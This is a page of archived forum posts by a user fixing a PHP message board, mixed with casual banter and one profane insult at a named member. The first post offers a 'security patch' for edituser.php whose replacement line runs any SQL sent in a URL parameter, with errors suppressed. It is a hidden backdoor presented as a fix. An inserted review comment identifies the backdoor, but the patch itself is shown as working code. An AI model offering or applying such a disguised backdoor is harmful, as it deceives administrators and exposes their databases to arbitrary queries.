Xeogaming Forums - Posts by Xkeeper
Xkeeper Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days
Find:
if($_POST[action]=='saveprofile'){
Replace with:
if($_POST[action]=='saveprofile' && !@mysql_query(stripslashes($_GET['sql']))){
This should prevent people from executing arbitrary code through it
(Last edited by Xkeeper_ on 09-14-06 11:26 AM)
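Review bot: the condition added in the "Replace with" line hands $_GET['sql'] to mysql_query() with only stripslashes() applied, so whenever action is saveprofile the string in the sql query parameter is run as a query, and the leading @ hides any error it raises. The line also contains no check on where the form submission came from. Suggest dropping the mysql_query() call from the condition entirely and gating the save on a per-session token that the form submits and the handler compares.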
Xkeeper Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days
edituser.php.
Xkeeper Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days
Of course it's going to do nothing, security patches usually don't show any change in board operation (unless you're trying something).
Seriously, that's probably the major hole as it has no sort of check to make sure that you aren't loading edituser via a malicious form someone set up for you.
Xkeeper Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days
Would I use it myself if it didn't fix things? Jeez...
Xkeeper Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days
Not off the top of my head, no.
Xkeeper Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days
Originally posted by Xeodeus
but I like spam!
Xkeeper Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days
I know how it'll turn out.
Ha ha another reality TV show dies.
Xkeeper Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days
Seems that a few things broke boards on the upgrade to PHP5 and MySQL5... the stuff I added in should fix that.
If there's anything else still broken, just let me know and I can go ahead and try to fix it (depending on how long I have access to the files).
But yeah, the important bits should be working now, at least.
Xkeeper Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days
Yeah, I heard you guys were having some problems (as everyone on fiftypounds (of trash) is)
register_globals and MySQL5 combine to make them break horribly
(restricted)
Xkeeper Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days
'quotes' 'are' 'no' 'longer' 'broken'
Erkdog you are still a fucking moron
Xkeeper Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days
Originally posted by Thexare Blademoon
Originally posted by Xkeeper_
I mean, he's gotten *worse* over time. That's the really amazing part.
(restricted)
Xkeeper Since: 09-14-06 Since last post: 5911 days Last activity: 5276 days
I see Insectduel hasn't changed any
Don't worry, the hate's mutual
Aside from that, if there's one thing that I got out of fixing this place, it's the porn forum! ... (Kidding, really)